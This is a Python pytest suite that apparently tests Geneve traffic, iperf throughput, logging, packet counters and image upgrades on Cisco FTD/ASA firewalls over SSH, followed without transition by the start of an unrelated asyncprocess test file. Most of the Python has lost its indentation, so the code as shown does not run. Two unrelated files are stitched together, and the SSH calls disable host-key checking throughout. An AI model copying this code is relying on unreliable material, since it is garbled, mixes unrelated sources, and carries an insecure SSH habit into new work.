s.send("Yijun is coming".encode())
msg = s.recv(1024)
print(msg)
"""
with open("test.py", "w+") as f:
f.write(test)
cmd4 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"test.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd4).read()
cmd5 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3;python3 test.py'"
resp = os.popen(cmd5).read()
assert "[Pytest]TCP:23 is back!" in resp
    # terminate server
cmd6 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo rm -rf test.py'"
os.popen(cmd6).read()
cmd7 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3\''"
os.popen(cmd7).read()
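# The TCP/UDP tests above and below rely on a separate Pytest_server.py being copied to the
# remote hosts. Based only on the ports and reply strings asserted in these tests, it is
# assumed to behave roughly like the sketch below; the real file may differ, and this sketch
# is not used by the test suite.
def _pytest_server_sketch():
    """Illustrative echo responders for TCP/23 and UDP/666 (assumption, unused)."""
    import socket
    import threading

    def tcp_23():
        srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind(("0.0.0.0", 23))
        srv.listen(1)
        while True:
            conn, _ = srv.accept()
            conn.recv(1024)
            conn.sendall(b"[Pytest]TCP:23 is back!")
            conn.close()

    def udp_666():
        srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        srv.bind(("0.0.0.0", 666))
        while True:
            _, addr = srv.recvfrom(1024)
            srv.sendto(b"[Pytest]UDP:666 is back!", addr)

    threading.Thread(target=tcp_23, daemon=True).start()
    udp_666()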
@pytest.mark.geneveFTD
@pytest.mark.FTDtcp2to1
def test_TCP23_from_inside_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"Pytest_server.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd2).read()
# 2. run server file
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3;sudo screen -d -m sudo python3 Pytest_server.py'"
os.popen(cmd3).read()
# 3. test
test = f"""
import socket
s=socket.socket()
s.connect(("{app_jb_ip}",23))
s.send("Yijun is coming".encode())
msg = s.recv(1024)
print(msg)
"""
with open("test.py", "w+") as f:
f.write(test)
cmd4 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"test.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd4).read()
cmd4_2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"test.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd4_2).read()
cmd5 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3;python3 test.py\''"
resp = os.popen(cmd5).read()
assert "[Pytest]TCP:23 is back!" in resp
    # terminate server
cmd6 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo rm -rf test.py'"
os.popen(cmd6).read()
cmd6_2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo rm -rf test.py\''"
os.popen(cmd6_2).read()
cmd7 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3'"
os.popen(cmd7).read()
@pytest.mark.geneveFTD
@pytest.mark.FTDudpYijun
def test_UDP666_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"Pytest_server.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd2).read()
# 2. run server file
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo screen -d -m sudo python3 Pytest_server.py\''"
os.popen(cmd3).read()
# 3. test
test = f"""
import socket
s=socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
s.sendto("Yijun is coming".encode(), ("{app_ip}", 666))
msg = s.recvfrom(1024)
print(msg[0])
"""
with open("test.py", "w+") as f:
f.write(test)
cmd4 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"test.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd4).read()
cmd5 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo python3 test.py'"
resp = os.popen(cmd5).read()
assert "[Pytest]UDP:666 is back!" in resp
    # terminate server
cmd6 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo rm -rf test.py'"
os.popen(cmd6).read()
cmd7 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3\''"
os.popen(cmd7).read()
@pytest.mark.geneveFTD
@pytest.mark.FTDudp1to2
def test_UDP_from_inside_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"Pytest_server.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd2).read()
# 2. run server file
cmd_k = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3\''"
os.popen(cmd_k).read()
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo screen -d -m sudo python3 Pytest_server.py\''"
os.popen(cmd3).read()
# 3. test
test = f"""
import socket
s=socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
s.sendto("Yijun is coming".encode(), ("{app_ip}", 666))
msg = s.recvfrom(1024)
print(msg[0])
"""
with open("test.py", "w+") as f:
f.write(test)
cmd4 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"test.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd4).read()
cmd5 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3;python3 test.py'"
resp = os.popen(cmd5).read()
assert "[Pytest]UDP:666 is back!" in resp
    # terminate server
cmd6 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo rm -rf test.py'"
os.popen(cmd6).read()
cmd7 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo pkill python3\''"
os.popen(cmd7).read()
@pytest.mark.geneveFTD
@pytest.mark.FTDudp2to1
def test_UDP_from_outside_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
# 1. transfer server file
cmd1 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"Pytest_server.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"Pytest_server.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd2).read()
# 2. run server file
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3;sudo screen -d -m sudo python3 Pytest_server.py'"
os.popen(cmd3).read()
# 3. test
test = f"""
import socket
s=socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
s.sendto("Yijun is coming".encode(), ("{app_jb_ip}", 666))
msg = s.recvfrom(1024)
print(msg[0])
"""
with open("test.py", "w+") as f:
f.write(test)
cmd4 = "scp -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"test.py ubuntu@{app_jb_ip}:/home/ubuntu/."
os.popen(cmd4).read()
cmd4_2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'scp -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"test.py ubuntu@10.0.1.101:/home/ubuntu/.'"
os.popen(cmd4_2).read()
cmd5 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo python3 test.py; pkill python3\''"
resp = os.popen(cmd5).read()
assert "[Pytest]UDP:666 is back!" in resp
    # terminate server
cmd6 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo rm -rf test.py'"
os.popen(cmd6).read()
cmd6_2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
"ubuntu@10.0.1.101 \'sudo rm -rf test.py\''"
os.popen(cmd6_2).read()
cmd7 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill python3'"
os.popen(cmd7).read()
@pytest.mark.geneveFTD
@pytest.mark.FTDiperfudp
def test_iperf_udp_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
cmd1 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo screen -d -m sudo iperf -s -u'"
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo iperf -c {app_jb_ip} -u\''"
res = os.popen(cmd2).read()
    bd = re.compile(r" ([\d.]+?) (?=MBytes)").findall(res)[0]
assert float(bd) > 0
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill iperf'"
os.popen(cmd3).read()
@pytest.mark.geneveFTD
@pytest.mark.FTDiperfudpreverse
def test_iperf_udp_reverse_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
cmd1 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo screen -d -m sudo iperf -s -u\''"
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo iperf -c {app_ip} -u;'"
res = os.popen(cmd2).read()
print("Iperf result:\n", res)
    bd = re.compile(r" ([\d.]+?) (?=MBytes)").findall(res)[0]
assert float(bd) > 0
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo pkill iperf\''"
os.popen(cmd3).read()
@pytest.mark.geneveFTD
@pytest.mark.FTDiperftcp
def test_iperf_tcp_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
cmd1 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo screen -d -m sudo iperf -s'"
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo iperf -c {app_jb_ip}\''"
res = os.popen(cmd2).read()
print(res)
    try:
        bd = re.compile(r" ([\d.]+?) (?=MBytes)").findall(res)[0]
    except IndexError:
        # iperf reports large transfers in GBytes rather than MBytes
        bd = re.compile(r" ([\d.]+?) (?=GBytes)").findall(res)[0]
assert float(bd) > 0
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo pkill iperf'"
os.popen(cmd3).read()
@pytest.mark.geneveFTD
@pytest.mark.FTDiperftcpreverse
def test_iperf_tcp_reverse_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
cmd1 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo screen -d -m sudo iperf -s\''"
os.popen(cmd1).read()
cmd2 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'sudo iperf -c {app_ip}'"
res = os.popen(cmd2).read()
print("Iperf result:\n", res)
    try:
        bd = re.compile(r" ([\d.]+?) (?=MBytes)").findall(res)[0]
    except IndexError:
        # iperf reports large transfers in GBytes rather than MBytes
        bd = re.compile(r" ([\d.]+?) (?=GBytes)").findall(res)[0]
assert float(bd) > 0
cmd3 = "ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo pkill iperf\''"
os.popen(cmd3).read()
@pytest.mark.geneveFTD
@pytest.mark.FTDcounter
def test_udp_counter_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
cmd1 = "clear asp drop"
cmd2 = "show asp drop frame geneve-invalid-udp-checksum"
ftd_address = f"ssh -i 'testDog.pem' admin@{ftd_ip}"
ftd_config(ftd_address, cmd1)
send(IP(dst="20.0.1.102") / UDP(sport=20001, dport=6081, chksum=0) / b'\x08\x00\x08')
_, res = ftd_config(ftd_address, cmd2)
assert "geneve-invalid-udp-checksum" in res
@pytest.mark.geneveFTD
@pytest.mark.FTDreset
def test_tcp_counter_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
cmd = f"ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo screen -d -m ssh root@{asa_jb_ip}\''"
os.popen(cmd).read()
cmd2 = "clear conn address 10.0.1.101"
cmd3 = "show asp drop"
cmd1 = "clear asp drop"
ftd_address = f"ssh -i 'testDog.pem' admin@{ftd_ip}"
ftd_config(ftd_address, cmd1)
ftd_config(ftd_address, cmd2)
cmd = f"ssh -i 'testDog.pem' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@{app_jb_ip} 'ssh -i \'testDog.pem\' -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"ubuntu@10.0.1.101 \'sudo pkill screen\''"
os.popen(cmd).read()
_, res = ftd_config(ftd_address, cmd3)
assert "tcp-not-syn" in res
@pytest.mark.geneveFTD
@pytest.mark.FTDlogserver
def test_log_server_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
config = '''
logging enable
logging buffer-size 52428800
logging buffered debugging
logging trap debugging
logging host data-interface 20.0.1.10
logging message 302020
'''
ftd_address = f"ssh -i 'testDog.pem' admin@{ftd_ip}"
ftd_config(ftd_address, config)
import paramiko
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh2 = paramiko.SSHClient()
ssh2.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(app_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
ssh2.connect(asa_jb_ip, username='ubuntu', password='', key_filename="testDog.pem")
_, stdout, _ = ssh2.exec_command("sudo ifconfig eth1 down;sudo ifconfig eth1 20.0.1.10/24;sudo ifconfig eth1 up")
stdout.channel.recv_exit_status()
while True:
_, stdout, _ = ssh.exec_command("ssh -i 'testDog.pem' -o StrictHostKeyChecking=no "
"-o UserKnownHostsFile=/dev/null ubuntu@10.0.1.101 'ping 8.8.8.8 -c 10'")
stdout.channel.recv_exit_status()
resp1 = "".join(stdout.readlines())
if not resp1:
continue
else:
break
assert "0% packet loss" in resp1
_, stdout, _ = ssh2.exec_command("sudo systemctl restart syslog")
stdout.channel.recv_exit_status()
while True:
_, stdout, _ = ssh2.exec_command("tail -n 100 /var/log/syslog")
stdout.channel.recv_exit_status()
resp2 = "".join(stdout.readlines())
if not resp2:
continue
else:
break
assert "8.8.8.8" in resp2
ssh.close()
ssh2.close()
@pytest.mark.geneveFTD
@pytest.mark.FTDgenevedebug
def test_debug_geneve_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
cmd1 = "debug geneve encapsulation"
cmd2 = "debug geneve encapsulation 4"
cmd3 = "debug geneve decapsulation"
cmd4 = "debug geneve decapsulation 4"
cmd5 = "debug geneve all"
    cmd_clean = "unde all"  # short form of "undebug all"
cmd_show = "show debug"
ftd_address = f"ssh -i 'testDog.pem' admin@{ftd_ip}"
import pexpect
conn = pexpect.spawn(ftd_address)
Ocean_reply(conn)
go2ftd(conn)
conn.sendline("en")
Ocean_reply(conn)
conn.sendline(cmd_clean)
Ocean_reply(conn)
conn.sendline(cmd_show)
_, _, res = Ocean_reply(conn)
assert "debug geneve" not in res
conn.sendline(cmd_clean)
Ocean_reply(conn)
conn.sendline(cmd1)
Ocean_reply(conn)
conn.sendline(cmd_show)
_, _, res = Ocean_reply(conn)
assert "debug geneve encapsulation enabled at level 1" in res
conn.sendline(cmd_clean)
Ocean_reply(conn)
conn.sendline(cmd2)
Ocean_reply(conn)
conn.sendline(cmd_show)
_, _, res = Ocean_reply(conn)
assert "debug geneve encapsulation enabled at level 4" in res
conn.sendline(cmd_clean)
Ocean_reply(conn)
conn.sendline(cmd3)
Ocean_reply(conn)
conn.sendline(cmd_show)
_, _, res = Ocean_reply(conn)
assert "debug geneve decapsulation enabled at level 1" in res
conn.sendline(cmd_clean)
Ocean_reply(conn)
conn.sendline(cmd4)
Ocean_reply(conn)
conn.sendline(cmd_show)
_, _, res = Ocean_reply(conn)
assert "debug geneve decapsulation enabled at level 4" in res
conn.sendline(cmd_clean)
Ocean_reply(conn)
conn.sendline(cmd5)
Ocean_reply(conn)
conn.sendline(cmd_show)
_, _, res = Ocean_reply(conn)
assert "debug geneve encapsulation enabled at level 1" in res
assert "debug geneve decapsulation enabled at level 1" in res
conn.sendline(cmd_clean)
Ocean_reply(conn)
conn.sendline(cmd_show)
_, _, res = Ocean_reply(conn)
assert "debug geneve" not in res
conn.close()
del conn
@pytest.mark.geneveFTD
@pytest.mark.FTDstatistics
def test_stats_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
cmd1 = "show interface vni 1"
cmd2 = "show nve 1"
ftd_address = f"ssh -i 'testDog.pem' admin@{ftd_ip}"
_, cont1_1 = ftd_config(ftd_address, cmd1)
_, cont2_1 = ftd_config(ftd_address, cmd2)
p1 = "(.*) packets input"
p2 = "(.*) packets output"
output_cmd1_1 = int(re.compile(p1).findall(cont1_1)[0])
output_cmd2_1 = int(re.compile(p2).findall(cont2_1)[0])
test_Basic_PingGoogle_FTD(local_run)
_, cont1_2 = ftd_config(ftd_address, cmd1)
_, cont2_2 = ftd_config(ftd_address, cmd2)
output_cmd1_2 = int(re.compile(p1).findall(cont1_2)[0])
output_cmd2_2 = int(re.compile(p2).findall(cont2_2)[0])
assert output_cmd1_2 > output_cmd1_1
assert output_cmd2_2 > output_cmd2_1
@pytest.mark.geneveFTD
@pytest.mark.FTDcapture
def test_capture_FTD(local_run):
app_jb_ip, asa_jb_ip, asa_ip, app_ip, ftd_ip, fmc_ip = local_run
cmd0 = "no capture g"
cmd1 = "clear cap /all"
cmd2 = "cap g int ge trace"
cmd3 = "show capture g | in icmp: echo request"
ftd_address = f"ssh -i 'testDog.pem' admin@{ftd_ip}"
ftd_config(ftd_address, cmd0)
ftd_config(ftd_address, cmd1)
ftd_config(ftd_address, cmd2)
test_Basic_PingGoogle_FTD(local_run)
time.sleep(1)
_, cont3 = ftd_config(ftd_address, cmd3)
    pNum = int(re.compile(r"\d+: ").findall(cont3)[0].strip().split(":")[0])
cmd4 = f"show capture g trace packet-number {pNum} | in Action:"
cmd5 = "no capture g"
_, cont4 = ftd_config(ftd_address, cmd4)
assert "Action: allow" in cont4
ftd_config(ftd_address, cmd5)
@pytest.mark.updowngrade
def test_image_replacement(keyFile, trs):
print("keyFile::", keyFile)
print("Debug::", trs)
obj = aws(record=False)
res1 = obj.blind("Test-1-169-EC2-ASA", "EC2INSTANCE")
res2 = res = obj.blind("Test-1-169-EC2-ASA-JB", "EC2INSTANCE")
# backup config in ASA
cmd = "show run"
asa_address = f"ssh -i 'testDog.pem' admin@{res1['public_ip']}"
old_config = asa_config(asa_address, cmd)
assert old_config != ""
# transfer image to asa
new_image = "geneve_new.smp"
command = f"scp -i {keyFile} -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null " \
f"{new_image} ubuntu@{res2['public_ip']}:/var/www/html/."
timer("start")
os.popen(command).read()
timer("stop")
import pexpect
debug = trs
conn = pexpect.spawn(asa_address)
conn, result, cont = Geneve_reply(conn)
conn.sendline("en")
conn, result, cont = Geneve_reply(conn)
print("debug:start copy")
conn.sendline("copy http://20.0.250.10/geneve_new.smp disk0:/geneve_new.smp")
conn, result, cont = Geneve_reply(conn, timeout=120, debug=debug)
print("debug:end copy")
# print old version
conn.sendline("show version")
conn, result, cont = Geneve_reply(conn, timeout=120, debug=debug)
print("Old Version::", cont)
# reload asa
conn.sendline("boot system disk0:/geneve_new.smp")
conn, result, cont = Geneve_reply(conn)
conn.sendline("reload")
conn, result, cont = Geneve_reply(conn, debug=debug)
print('WAITED', wait(600))
    conn.close()
del conn
# print new version
conn = pexpect.spawn(asa_address)
conn, result, cont = Geneve_reply(conn)
conn.sendline("en")
conn, result, cont = Geneve_reply(conn)
conn.sendline("show version")
conn, result, cont = Geneve_reply(conn, timeout=120, debug=debug)
print("New Version::", cont)
# config is same as before/after
cmd = "show run"
asa_address = f"ssh -i 'testDog.pem' admin@{res['public_ip']}"
new_config = asa_config(asa_address, cmd)
temp = new_config.replace("geneve_new.smp", "geneve.smp")
assert temp == old_config
pass
if __name__ == '__main__':
pytest.main(["-q", "-s", "-ra", "test_geneve.py"])
# capture abc interface data-interface
# show capture abc packet-number 18 detail decode
#
# copy /pcap capture:abc abc.pcap
#
# copy disk0:/abc.pcap scp://root@1.2.3.4:/home/ubuntu/.
#######################
# access-list geneve extended permit icmp host 3.101.116.24 host 10.0.1.101
# access-list geneve extended permit tcp host 3.101.116.24 host 10.0.1.101
# access-list geneve extended permit udp host 3.101.116.24 host 10.0.1.101
#######################
# direct vs roundway
# aaa authentication listener http data-interface port www
# ~~~~exclusive~~~~
# object network gwlb-net
# subnet 20.0.1.0 255.255.255.0
#
# object-group network gwlb
# network-object object gwlb-net
#
# object-group network metadata
# network-object host 20.0.1.10
#
# object service http80
# service tcp destination eq www
#
# nat (data-interface,data-interface) source static gwlb interface destination static interface metadata service http80 http80
#
|
test_asyncprocess.py
|
import asyncio
import gc
import os
import signal
import sys
import threading
import weakref
from datetime import timedelta
from time import sleep
import pytest
from tornado import gen
from tornado.locks import Event
from distributed.compatibility import WINDOWS
from distributed.metrics import time
from distributed.process import AsyncProcess
from distributed.utils import mp_context
from distributed.utils_test import gen_test, nodebug, pristine_loop
def feed(in_q, out_q):
obj = in_q.get(timeout=5)
out_q.put(obj)
def exit(q):
sys.exit(q.get())
def exit_now(rc=0):
sys.exit(rc)
def exit_with_signal(signum):
signal.signal(signal.SIGINT, signal.SIG_DFL)
while True:
os.kill(os.getpid(), signum)
sleep(0.01)
def wait():
while True:
sleep(0.01)
def threads_info(q):
q.put(len(threading.enumerate()))
q.put(threading.current_thread().name)
@nodebug
@gen_test()
async def test_simple():
to_child = mp_context.Queue()
from_child = mp_context.Queue()
proc = AsyncProcess(target=feed, args=(to_child, from_child))
assert not proc.is_alive()
assert proc.pid is None
assert proc.exitcode is None
assert not proc.daemon
proc.daemon = True
assert proc.daemon
wr1 = weakref.ref(proc)
wr2 = weakref.ref(proc._process)
# join() before start()
with pytest.raises(AssertionError):
await proc.join()
await proc.start()
assert proc.is_alive()
assert proc.pid is not None
assert proc.exitcode is None
t1 = time()
await proc.join(timeout=0.02)
dt = time() - t1
assert 0.2 >= dt >= 0.01
assert proc.is_alive()
assert proc.pid is not None
assert proc.exitcode is None
# setting daemon attribute after start()
with pytest.raises(AssertionError):
proc.daemon = False
to_child.put(5)
assert from_child.get() == 5
# child should be stopping now
